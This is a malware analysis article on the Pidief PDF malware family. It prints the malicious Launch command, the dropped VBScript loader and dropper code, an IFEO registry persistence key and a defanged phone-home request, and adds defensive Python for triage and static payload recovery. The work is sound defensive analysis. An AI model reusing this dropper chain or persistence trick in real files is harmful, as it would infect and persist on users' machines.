
Malware FAQ


PDF Malware: Pidief

Author: Joel Yonts

The exchange of electronic documents has become a cornerstone of our information age. Whether dealing with corporate users exchanging documents with customers or gamers downloading the latest cheat codes, the consistent need is a document system that can deliver rich content to a wide audience of users. Adobe answered this need in the early 90s with the Portable Document Format (PDF)¹. This document standard supports a wide range of text, multimedia, and dynamic content elements. Additionally, PDF viewers can be found (and are normally pre-installed) on all major computing and mobile platforms, making it the most popular document format available today.

Unsurprisingly, this popularity and adoption have gained the attention of malware authors. For these cybercriminals, the opportunity to deliver malicious code through a document format that exists on all platforms and is critical to both business and home users is an attractive one. PDF's dynamic content functionality elevates this potential further, providing a perfect landscape for crafting malicious PDFs (embedded script support, execute-on-open actions).

This potential was first realized a decade ago when a PDF worm known as Peachy used an embedded Visual Basic script to cause problems for Outlook users. Over the past 10 years much has changed on the malware scene, and we have seen several new PDF malware families. Even though motives and payloads have changed over this period, the common infection pattern remains the same:

Figure 1: PDF Infection Pattern

¹Portable Document Format (PDF) was released as an open standard in Fall 2008

A Recent Example: Pidief

Pidief is a PDF malware family that was first discovered in late 2007 and continues to evolve and be active in early 2010. Typically delivered via email attachment or an Internet link embedded in email, this malware follows the pattern outlined above. Figure 2 shows a sample email that was used to deliver Pidief in April 2010.

Figure 2: Email Delivery of Pidief PDF

If a user ignored the bad English and opened the attached PDF, a one-page document with the words "Important Information doc.pdf" (Figure 3) would be displayed, along with a Launch File Warning (Figure 4). A determined user clicking "open" in the dialog box would begin the infection process, and a flurry of activity would commence behind the scenes. From the user's perspective, there is no visible activity other than a few windows that pop up and disappear quickly.

Figure 3: PDF Displayed by Malware

Figure 4: PDF Viewer Warning the User of Potential Danger

Pidief Infection Process

From the execution analysis shown above (Figure 4) we see that the infection process is based on the PDF launching an external program. Examining the contents of the attached PDF (MD5 1dcd4a3f5d05433fcebf88d9138a1966) with PDFiD shows that the file does contain an "Open Action" object (Table 1), and the contents of that object (Table 2) are a Launch action that passes a command line to cmd.exe; that command line uses a series of echo statements to assemble an embedded VBScript. The script did not contain exploit code; otherwise user interaction (Figure 4) would not have been required to initiate the infection process.

TABLE 1: SUSPECT PDF OBJECT
PDFiD 0.0.11 doc.pdf
 PDF Header: %PDF-1.1
 obj                    8
 endobj                 8
 stream                 1
 endstream              1
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    0
 /JavaScript            0
 /AA                    0
 /OpenAction            1
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                1
 /Colors > 2^24         0
TABLE 2: EMBEDDED "OPEN ACTION"
obj 8 0
 Type: /Action
 Referencing:
  <<
    /Type /Action
    /S /Launch
    /Win
      <<
        /F (cmd.exe)
        /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs &&
            echo Set f=fso.OpenTextFile("doc.pdf", 1, True) >> script.vbs &&
            echo pf=f.ReadAll >> script.vbs &&
            echo s=InStr(pf,"'SS") >> script.vbs &&
            echo e=InStr(pf,"'EE") >> script.vbs &&
            echo s=Mid(pf,s,e-s) >> script.vbs &&
            echo Set z=fso.OpenTextFile("batscript.vbs", 2, True) >> script.vbs &&
            echo s = Replace(s,"%","") >> script.vbs &&
            echo z.Write(s) >> script.vbs &&
            script.vbs &&
            batscript.vbs
            Click the "open" button to view this document:)
      >>
  >>

During execution, the cmd.exe command line listed above uses echo redirection to write a new Visual Basic script called script.vbs to the current working directory and then executes it.
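The Table 1 and Table 2 checks can be scripted for bulk triage. The following Python is an added example written for this page (it is not PDFiD, pdf-parser, or any code from the article): it counts the same keyword tokens PDFiD reports and pulls the /F and /P strings out of every /Launch action, handling the nested parentheses that the Pidief command line contains. The sample PDF bytes are constructed here to mirror Table 2, not taken from the real doc.pdf.

```python
import re
# Name tokens PDFiD tallies; /OpenAction plus /Launch with no /JS is the Pidief pattern.
KEYWORDS = (b"/OpenAction", b"/AA", b"/JS", b"/JavaScript", b"/Launch", b"/EmbeddedFile")

# Constructed sample modelled on the object in Table 2 (not the real doc.pdf).
SAMPLE_PDF = (b"%PDF-1.1\n1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 8 0 R >> endobj\n"
    b"8 0 obj << /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c echo Set "
    b"fso=CreateObject(\"Scripting.FileSystemObject\") > script.vbs && script.vbs) >> >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n")

def keyword_counts(pdf: bytes) -> dict:
    """Whole-token counts of each keyword, like PDFiD's summary."""
    return {k.decode(): len(re.findall(re.escape(k) + rb"(?![A-Za-z])", pdf)) for k in KEYWORDS}

def read_literal(data: bytes, start: int) -> bytes:
    """Read the PDF literal string whose '(' is at data[start]. Nested balanced parentheses
    are legal unescaped (the Pidief /P string has CreateObject("...")); escapes pass through raw."""
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":
            out += data[i + 1:i + 2]
            i += 2
            continue
        depth += (c == b"(") - (c == b")")
        if depth == 0:
            return bytes(out)
        if not (c == b"(" and depth == 1):   # skip only the string's own opening paren
            out += c
        i += 1
    raise ValueError("unterminated literal string")

def launch_actions(pdf: bytes) -> list:
    """(object number, /F target, /P parameters) for every /Launch action object."""
    found = []
    for m in re.finditer(rb"(\d+)\s+\d+\s+obj\b(.*?)\bendobj", pdf, re.S):
        body = m.group(2)
        if re.search(rb"/S\s*/Launch(?![A-Za-z])", body):
            f = re.search(rb"/F(?![A-Za-z])\s*\(", body)
            p = re.search(rb"/P(?![A-Za-z])\s*\(", body)
            found.append((int(m.group(1)),
                          read_literal(body, f.end() - 1).decode("latin-1") if f else None,
                          read_literal(body, p.end() - 1).decode("latin-1") if p else None))
    return found

def triage(pdf: bytes) -> dict:
    """Suspicious when an auto-run hook (/OpenAction or /AA) meets script or launch content."""
    c = keyword_counts(pdf)
    auto, active = c["/OpenAction"] + c["/AA"], c["/JS"] + c["/JavaScript"] + c["/Launch"]
    return {"counts": c, "launch": launch_actions(pdf), "suspicious": auto > 0 and active > 0}
```

Run `triage(open(path, "rb").read())` over a quarantine folder; a non-greedy `\((.*?)\)` regex would have cut the Pidief command at the first `)` after FileSystemObject, which is why the literal-string reader is needed.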

TABLE 3: DROPPED SCRIPT.VBS SCRIPT
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("doc.pdf", 1, True)
pf=f.ReadAll
s=InStr(pf,"'SS")
e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("batscript.vbs", 2, True)
s = Replace(s,"%","")
z.Write(s)

script.vbs opens the original PDF as text, extracts everything between the 'SS and 'EE markers, strips the '%' characters that obfuscate it, and writes the result out as a very large secondary script called batscript.vbs. This script has two main parts. The first is a large embedded object encoded and stored in a local VB variable.

TABLE 4: OBJECT EMBEDDED IN BATSCRIPT.VBS
b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),c(004),
c(000),c(000),c(000),c(255),c(255),c(000),c(000),c(184),c(000),c(000),
c(000),c(000),c(000),c(000),c(000),c(064),c(000),c(000),c(000),c(000),
c(000),c(000),c(000),c(000),c(000),c(000),c(000),c(000),c(000),c(000),
c(000),c(000),c(000)
<<< 248,111 characters omitted for brevity >>>

The second part of batscript.vbs is a dropper routine that takes the data stored in the local VB variable and writes it to disk under the name game.exe. The new file is executed after creation, and the remaining lines of batscript.vbs delete the files dropped during the infection process.

TABLE 5: BATSCRIPT.VBS DROPPER FUNCTIONALITY
...
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("game.exe", 2, True)
For i = 0 To 35328
f.write(b(i))
Next
f.close()
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "cmd.exe /c game.exe"
WScript.Sleep 3000
Set f = FSO.GetFile("game.exe")
f.Delete
Set f = FSO.GetFile("batscript.vbs")
f.Delete
Set f = FSO.GetFile("script.vbs")
f.Delete
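As an added example (not code from the article), the following Python reproduces what script.vbs (Table 3) and the first part of batscript.vbs (Tables 4 and 5) do, statically, so an analyst can recover the embedded executable from a sample without executing either script. It assumes, as the 077,090 ("MZ") prefix in Table 4 suggests, that c(n) is a Chr(n) wrapper; the PDF text below is a constructed stand-in, not the real doc.pdf.

```python
import re

# Constructed stand-in for doc.pdf: a stub PDF followed by the marker-delimited,
# %-obfuscated VBScript, laid out the way Tables 3 and 4 describe. Not the real sample.
SAMPLE_PDF_TEXT = (
    "%PDF-1.1\n1 0 obj << /Type /Catalog >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"
    "'SS\n"
    "b=Arr%ay(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),c(004),\n"
    "c(000),c(000),c(000),c(255),c(255),c(000),c(000),c(184))\n"
    "Set f%so = Cre%ateObject(\"Scripting.FileSystemObject\")\n"
    "Set f = fso.Op%enTextFile(\"game.exe\", 2, True)\n"
    "For i = 0 To 16\n    f.write(b(i))\nNext\n"
    "'EE\n"
)

def extract_batscript(pdf_text: str) -> str:
    """Do what script.vbs (Table 3) does, statically: slice from the 'SS marker up to
    the 'EE marker and drop every '%'. VBScript's InStr/Mid are 1-based, so Mid(pf,s,e-s)
    is exactly the 0-based slice pf[s:e]. Read a real file with encoding='latin-1'."""
    s, e = pdf_text.find("'SS"), pdf_text.find("'EE")
    if s < 0 or e < 0 or e <= s:
        raise ValueError("start/end markers not found")
    return pdf_text[s:e].replace("%", "")

def decode_payload(batscript: str) -> bytes:
    """Rebuild the dropped file from the b=Array(c(077),c(090),...) literal (Table 4).
    Assumption (not stated in the article): c(n) is a Chr(n) wrapper, which the 077,090
    ('M','Z') prefix supports. Decoding statically avoids running the dropper."""
    m = re.search(r"b\s*=\s*Array\(((?:\s*c\(\d{1,3}\)\s*,?)+)\)", batscript)
    if not m:
        raise ValueError("payload array not found")
    return bytes(int(n) for n in re.findall(r"c\((\d+)\)", m.group(1)))

def looks_like_pe(data: bytes) -> bool:
    """Cheap check that the recovered bytes start with the MZ signature."""
    return data[:2] == b"MZ"

def recover(pdf_text: str) -> dict:
    """One shot: batscript text, the payload bytes, and whether they look like a PE."""
    bat = extract_batscript(pdf_text)
    payload = decode_payload(bat)
    return {"batscript": bat, "payload": payload, "is_pe": looks_like_pe(payload)}
```

The recovered bytes can be hashed and compared against the md5sum values in Table 6 without ever letting game.exe run.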

Examination of the file operations associated with the infection process reveals that game.exe leverages system services to install a new copy of itself in c:\program files\Microsoft Common\svchost.exe.

TABLE 6: FILE OPERATIONS ASSOCIATED WITH THE INFECTION PROCESS
"ACTIVITY","PROCESS","TARGET"
"Write","cmd.exe","C:\samples\script.vbs"
"Write","wscript.exe","C:\samples\batscript.vbs"
"Write","wscript.exe","C:\samples\game.exe"
"Write","svchost.exe","C:\Program Files\Microsoft Common\svchost.exe"
"Delete","wscript.exe","C:\samples\game.exe"
"Delete","wscript.exe","C:\samples\batscript.vbs"
"Delete","wscript.exe","C:\samples\script.vbs"
----
$ md5sum game.exe svchost.exe
c3a70f6177a95971f9b2f9eec338cfe2 game.exe
c3a70f6177a95971f9b2f9eec338cfe2 svchost.exe

To persist the infection, a Debugger value under the Image File Execution Options registry key for explorer.exe is set so that the newly installed malware is launched each time explorer.exe is executed.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
    Debugger: "C:\Program Files\Microsoft Common\svchost.exe"

Finally, we see "phone home" behavior initiated by the malicious svchost.exe process.

TABLE 7: NETWORK ACTIVITY - PHONE HOME
TCP_HIT/200 43 GET hxxp://190.xxx.xxx.xxx/lde/ld.php?v=1&rs=76487-641-0439075-23421273557024&n=1&uid=1 - NONE/- text/html
GET /lde/ld.php?v=1&rs=76487-641-0439075-23421273557024&n=1&uid=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: xxxxxxxxxxx.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 28 Apr 2010 22:00:01 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,User-Agent
Content-Length: 43
602|76487-641-0439075-23421273557024
w
608

Summary

As seen in the Pidief example, PDF malware often uses dynamic content in conjunction with a multi-stage infection process that spans multiple layers of obfuscation, files, and processes. The primary goal behind this complicated infection process is subversion: these techniques have helped malicious PDFs evade AV detection for years. When we compare the original VBScript techniques used by the Peachy worm (2001) with our present-day Pidief example, it is easy to see that these techniques persist simply because they work.

Malware Defense

A good first line of defense against PDF malware is security awareness. If users are trained to avoid opening attachments from unsolicited emails, especially when warning dialogs are displayed, the social engineering infection vector is severely limited. Trained users, combined with reputation-based network filtering and locally installed anti-malware solutions, round out a good defense against PDF malware and the Pidief malware family. An additional layer of protection may be added by implementing technical controls that prevent the execution of external programs by PDF viewers.

Additional Material

Below is an abbreviated list of information sources regarding PDF Malware and the Pidief malware family.

  1. This Adobe Acrobat worm is a real peach
    ZDNet - August 2001
  2. More Adobe Acrobat, Reader PDF Problems
    PCWorld - October 2007
  3. TrojanDropper:Win32/Pidrop.A
    Microsoft - April 2010
  4. PDF malware analysis
    SANS Institute - December 2009
  5. Didier Stevens PDF Tools